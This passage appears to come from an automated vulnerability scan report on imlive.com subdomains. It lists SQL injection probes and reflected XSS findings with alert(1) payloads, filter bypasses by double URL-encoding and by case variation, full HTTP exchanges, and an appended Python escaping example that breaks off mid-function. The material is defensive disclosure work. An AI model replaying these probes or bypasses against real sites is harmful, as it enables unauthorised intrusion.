<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.2. http://de.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSTRTBSD=DEBIMIMACEBMBLPLGCGPGBPD; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 8237
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.3. http://es.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSRTQCRC=BGLJMIMACIIMCJCMFKACJEGI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 8230
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.4. http://fr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/'' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQRCSC=CMMFJIMAHFOLCAODNFPHKCBL; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 8249
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.5. http://gr.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:34 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQRQRCTC=ABOPGJMANIICBDDCLAFKMEHJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:35 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.6. http://it.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://it.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQSRBSD=MDONOIMAHFCJJOAEABNJMFBH; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.7. http://nl.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://nl.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=DLPLFJMAFKGAEJJBLHMDPHAI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.8. http://tr.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=FAKPGKMALJJINONJKHHPMGGB; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.9. http://tr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:31:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=ABKPGKMAHOCFOJMDCOENFMKF; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 8250
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

2. Cross-site scripting (reflected)
There are 271 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain; and user input should be encoded at every point where it is copied into application responses, replacing HTML metacharacters (< > " ' and =) with the corresponding HTML entities. The encoding must match the output context. Several findings below reflect the value into a JavaScript string that sits inside an event-handler attribute, which needs JavaScript string escaping and then HTML attribute encoding; a blacklist filter on its own is not a substitute for either layer.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (the onclick handler of a language-switch link, where the value lands inside a single-quoted JavaScript string). The payload 94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed into the application's response without encoding. Note that in the captured response the tag name appears lower-cased (<script>), so the case variation is only needed to get past the filter; the browser receives an ordinary script element.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with strict input validation and context-appropriate output encoding of every reflected value.

Request

GET /?94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fqzehq45mvboz255wmce5e45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fqzehq45mvboz255wmce5e45; path=/; HttpOnly
Set-Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:44 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:43 GMT
Connection: close
Content-Length: 19557
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||94ad3"><script>alert(1)</script>4f479a42c47~1');return false;">
...[SNIP]...

2.2. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26eb"><script>alert(1)</script>f467ed2684e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b26eb"><script>alert(1)</script>f467ed2684e=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:27 GMT
Connection: close
Content-Length: 21363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?b26eb"><script>alert(1)</script>f467ed2684e=1');return false;">
...[SNIP]...

2.3. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3ce'-alert(1)-'6c601d061a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it must, every character other than ASCII letters and digits should be escaped as \xHH (or \uHHHH) before the value is placed inside the JavaScript string literal, so that neither a quote nor a closing </script> sequence can survive into the output.
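The two reflection contexts in findings 2.1 and 2.3, as an added example that is not part of the report or the site's code: a case-sensitive blacklist of the kind the report says was bypassed with "ScRiPt", the raw reflection in each context, and the context-aware encoding the remediation notes for 2.1 and 2.3 call for. The templates are constructed to mirror the shapes of the captured responses (dAccess() and imgSrc are names taken from those responses); the blacklist is a hypothetical model of the filter, and nothing else about the site is assumed.

```python
"""Added example, not code from the scan report or from the site: the two
reflection contexts captured in findings 2.1 and 2.3, a case-sensitive
blacklist of the kind the report says was bypassed, and context-aware
output encoding that removes the need for the blacklist.

The templates are constructed to mirror the captured responses (dAccess()
and imgSrc are names taken from them); the blacklist is a hypothetical
model of the filter, not the site's code.
"""
import html
import re

# Hypothetical blacklist modelled on the report: refuses the literal
# "<script" but is case-sensitive, so "<ScRiPt" gets through.
BLACKLIST = re.compile(r"<script|javascript:")

# Finding 2.1: value inside a single-quoted JS string inside a double-quoted
# onclick attribute.  Finding 2.3: value inside a single-quoted JS string in
# an inline <script> block.  __VALUE__ marks the reflection point.
ONCLICK_TEMPLATE = (
    '<a class="StaticLink" title="English" href="http://imlive.com/" '
    "onclick=\"dAccess('http://imlive.com/uaccess/0/||__VALUE__~1');return false;\">"
)
SCRIPT_TEMPLATE = (
    "<script type=\"text/javascript\">"
    "try{var imgSrc='http://analytic.imlive.com/w.gif?ul=/?__VALUE__';}catch(e){};"
    "</script>"
)


def blacklist_allows(value: str) -> bool:
    """True when the (flawed) blacklist lets the value through."""
    return BLACKLIST.search(value) is None


def js_string_escape(value: str) -> str:
    """Escape a value for use inside a JavaScript string literal.

    Everything except ASCII letters and digits becomes \\xHH or \\uHHHH, so
    quotes, backslashes, angle brackets and slashes can neither end the
    string nor form a closing </script> tag.  The JS engine turns the
    escapes back into the original characters when it evaluates the literal.
    """
    out = []
    for ch in value:
        code = ord(ch)
        if ch.isalnum() and code < 128:
            out.append(ch)
        elif code < 256:
            out.append("\\x%02x" % code)
        else:
            out.append("\\u%04x" % code)
    return "".join(out)


def render_onclick_unsafe(value: str) -> str:
    """Raw reflection, as in the captured response for 2.1."""
    return ONCLICK_TEMPLATE.replace("__VALUE__", value)


def render_onclick_safe(value: str) -> str:
    """Nested contexts get nested encoding, innermost first.

    The browser HTML-decodes the attribute before the JS engine parses the
    handler, so the JS-string escape is applied first and the HTML attribute
    encoding on top of it; html.escape also neutralises any '&' that could
    otherwise start an entity inside the attribute.
    """
    encoded = html.escape(js_string_escape(value), quote=True)
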